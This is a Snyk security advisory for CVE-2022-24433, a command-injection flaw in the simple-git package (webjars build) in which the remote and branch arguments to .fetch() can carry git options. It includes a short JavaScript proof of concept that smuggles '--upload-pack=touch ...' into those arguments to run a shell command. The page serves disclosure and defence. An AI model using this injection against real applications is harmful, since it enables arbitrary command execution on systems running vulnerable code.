Command Injection Affecting org.webjars.npm:simple-git Open this link in a new tab package, versions [0,]
Exploit Maturity
Proof of concept
Attack Complexity
High
Confidentiality
High
Integrity
High
Availability
High
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications-
snyk-id
SNYK-JAVA-ORGWEBJARSNPM-2421245
-
published
11 Mar 2022
-
disclosed
11 Mar 2022
-
credit
Alessio Della Libera of Snyk Research Team
Introduced: 11 Mar 2022
CVE-2022-24433 Open this link in a new tabHow to fix?
There is no fixed version for org.webjars.npm:simple-git
.
Overview
org.webjars.npm:simple-git is an A light weight interface for running git commands in any node.js application.
Affected versions of this package are vulnerable to Command Injection via argument injection. When calling the .fetch(remote, branch, handlerFn)
function, both the remote
and branch
parameters are passed to the git fetch
subcommand. By injecting some git options it was possible to get arbitrary command execution.
PoC
// npm i simple-git
const simpleGit = require('simple-git');
const git = simpleGit();
let callback = () => {};
git.init(); // or git init
let origin1 = 'origin';
let ref1 = "--upload-pack=touch ./HELLO1;";
git.fetch(origin1, ref1, callback); // git [ 'fetch', 'origin', '--upload-pack=touch ./HELLO1;' ]
let origin2 = "--upload-pack=touch ./HELLO2;";
let ref2 = "foo";
git.fetch(origin2, ref2, callback); // git [ 'fetch', '--upload-pack=touch ./HELLO2;', 'foo' ]
let origin3 = 'origin';
let ref3 = "--upload-pack=touch ./HELLO3;";
git.fetch(origin3, ref3, { '--depth': '2' }, callback); // git [ 'fetch', '--depth=2', 'origin', '--upload-pack=touch ./HELLO3;' ]
// ls -la